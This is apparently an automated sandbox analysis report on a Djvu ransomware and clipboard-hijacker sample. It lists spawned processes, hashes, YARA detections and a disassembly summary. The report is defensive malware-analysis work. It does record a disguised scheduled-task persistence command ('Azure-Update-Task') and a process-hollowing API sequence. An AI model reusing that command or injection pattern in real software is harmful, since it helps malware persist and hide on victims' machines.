                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000001.247371622.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000001.247371622.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: build3.exe PID: 4308 Parent PID: 6664

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:31
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe'
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:343040 bytes
                                                                                                                                                                                                    MD5 hash:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000B.00000002.282201078.0000000003480000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: build3.exe PID: 4804 Parent PID: 4308

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:33
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe'
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:343040 bytes
                                                                                                                                                                                                    MD5 hash:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000C.00000002.284343753.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: schtasks.exe PID: 720 Parent PID: 4804

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:34
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:/C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
                                                                                                                                                                                                    Imagebase:0xc10000
                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: conhost.exe PID: 808 Parent PID: 720

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:35
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: mstsca.exe PID: 4856 Parent PID: 528

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:36
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:343040 bytes
                                                                                                                                                                                                    MD5 hash:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000013.00000002.297062571.0000000003260000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: mstsca.exe PID: 6500 Parent PID: 4856

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:40
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:343040 bytes
                                                                                                                                                                                                    MD5 hash:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000017.00000002.500875294.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000017.00000001.295994218.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: schtasks.exe PID: 6536 Parent PID: 6500

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:41
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:/C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
                                                                                                                                                                                                    Imagebase:0xc10000
                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: conhost.exe PID: 6360 Parent PID: 6536

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:42
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: mstsca.exe PID: 6676 Parent PID: 528

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:15:02
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:343040 bytes
                                                                                                                                                                                                    MD5 hash:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001B.00000002.354705969.00000000033E0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: mstsca.exe PID: 4952 Parent PID: 6676

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:15:07
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:343040 bytes
                                                                                                                                                                                                    MD5 hash:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001C.00000001.353651937.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001C.00000002.354158444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: mstsca.exe PID: 1256 Parent PID: 528

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:16:01
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                                                                                                                    File size:343040 bytes
                                                                                                                                                                                                    MD5 hash:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001F.00000002.474082718.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: mstsca.exe PID: 6960 Parent PID: 1256

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:16:03
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:343040 bytes
                                                                                                                                                                                                    MD5 hash:0FEA771099E342FACD95A9D659548919
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000020.00000001.473467293.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000020.00000002.473853443.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Analysis Process: Ln0LqSBLhS.exe PID: 6484 Parent PID: 4244 Ln0LqSBLhS.exeCOMMON

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 03C40110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 03C40156
                                                                                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 03C4016C
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 03C40255
                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03C40270
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03C40283
                                                                                                                                                                                                      • GetThreadContext.KERNELBASE(00000000,?), ref: 03C4029F
                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 03C402C8
                                                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 03C402E3
                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 03C40304
                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 03C4032A
                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 03C40399
                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 03C403BF
                                                                                                                                                                                                      • SetThreadContext.KERNELBASE(00000000,?), ref: 03C403E1
                                                                                                                                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 03C403ED
                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 03C40412
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2875986403-0
                                                                                                                                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                      • Instruction ID: 318b3501988ce0d480182a842fd16d1a193be6cfa2ec9a080d203489a5882693
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E609AB391D771AE41CF94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C40420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 03C40533
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                      • API String ID: 716092398-2341455598
                                                                                                                                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                      • Instruction ID: 5bc9adc27dfbbb32d6b91ef780663ea0cf5715f9e03014a0f17bf17cdf0e97c3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37513A70D48388DEEB11DBE8C849BDDBFB6AF11708F144098D544BF286C3BA5658CB66
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C405B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 03C405EC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID: apfHQ$o
                                                                                                                                                                                                      • API String ID: 3188754299-2999369273
                                                                                                                                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                      • Instruction ID: 4f0c31550613d3a2f481637324b551a26715a1a07bc8c3c9c92ebfb40f1492d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E011E70C0425CEADB10DB98C5183EEFFB5AF41308F188099C949AB242D7769B58CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 01FB47C6, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 01FB480E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235221600.0000000001FB4000.00000040.00000001.sdmp, Offset: 01FB4000, based on PE: false
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FirstModule32
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3757679902-0
                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction ID: 05d0316e3c4ae04c2eed7cfc431085824172c0cdf62e7276521ae6991d83e1bb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08F0C235600310ABE7207BFAA9CCAAA76ECBF49625F100228E643910C2DA75E8458A60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 01FB4485, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 01FB44D6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235221600.0000000001FB4000.00000040.00000001.sdmp, Offset: 01FB4000, based on PE: false
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction ID: f8f3dd756347e040c96d9d84d47a8b4343b20f855100bd00ab27b761c623a14d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30113F79A00208EFDB01DF99CA85E99BFF5AF08350F158094F9499B362D371EA50DF80
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 03C500D0, Relevance: 9.7, APIs: 6, Instructions: 732COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                                                                                                                      • Instruction ID: 373aeb9d5f0dd86695fe5ca52e053922100b9ecbe697da14d56a28aeac88dae5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB528F75D00228DBDF10DFA8C885BDEB7B5BF04304F148569E819EB250E731AA89CF99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4E6E0, Relevance: 8.2, APIs: 5, Instructions: 735COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 03C4E72D
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 03C4E756
                                                                                                                                                                                                      • _memset.LIBCMT ref: 03C4E784
                                                                                                                                                                                                        • Part of subcall function 03C8FC0C: std::exception::exception.LIBCMT ref: 03C8FC1F
                                                                                                                                                                                                        • Part of subcall function 03C8FC0C: __CxxThrowException@8.LIBCMT ref: 03C8FC34
                                                                                                                                                                                                        • Part of subcall function 03C8FC0C: std::exception::exception.LIBCMT ref: 03C8FC4D
                                                                                                                                                                                                        • Part of subcall function 03C8FC0C: __CxxThrowException@8.LIBCMT ref: 03C8FC62
                                                                                                                                                                                                        • Part of subcall function 03C8FC0C: std::regex_error::regex_error.LIBCPMT ref: 03C8FC74
                                                                                                                                                                                                        • Part of subcall function 03C8FC0C: __CxxThrowException@8.LIBCMT ref: 03C8FC82
                                                                                                                                                                                                        • Part of subcall function 03C8FC0C: std::exception::exception.LIBCMT ref: 03C8FC9B
                                                                                                                                                                                                        • Part of subcall function 03C8FC0C: __CxxThrowException@8.LIBCMT ref: 03C8FCB0
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 03C4EA0C
                                                                                                                                                                                                      • _memset.LIBCMT ref: 03C4EE5C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1338678108-0
                                                                                                                                                                                                      • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                                                                                                                      • Instruction ID: da3c8012d552974159b2850b53a0df4975e5aaf61042665eee43b05f4a5a8ed4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F529B71E003199FDF24CF68C894BAEBBF5BF44300F1985A9E846EB281D7719A45CB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4DBE0, Relevance: 6.7, APIs: 4, Instructions: 702COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                                                                      • Instruction ID: 720a1422a970b05a3ca9b82b9be8a4b62f8164f926a96b289c51be18c98e7931
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C526171E00209DFDB10DBB4C888FAEBBB5BF49704F148198E549EB291DB31AD45CBA0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C50B00, Relevance: 6.7, APIs: 4, Instructions: 660COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                                                                                                                      • Instruction ID: a8b1095beef7804d80cabe82dc2ee2fa04f8f135ae65f1ba41f7e535328146bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8426D71D00218DBDF14DFA4CC88BDEB7B5BF14308F284569E815EB250E771AA85CBA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4B0B0, Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                                                                                                                      • Instruction ID: 170ef4164084afbf6ba4535f3b84b90004f7bf25fbd26c4181b8f673a5f2a264
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAA1DB0A8090E4ABEF455A7E90B63EBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C430EE, Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
